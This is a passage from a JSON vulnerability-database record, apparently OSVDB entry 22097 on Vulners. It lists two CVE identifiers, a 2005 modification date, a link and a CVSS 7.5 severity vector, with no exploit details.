"bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-0637", "CVE-2005-4267"], "modified": "2005-12-20T03:42:38", "href": "https://vulners.com/osvdb/OSVDB:22097", "id": "OSVDB:22097", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
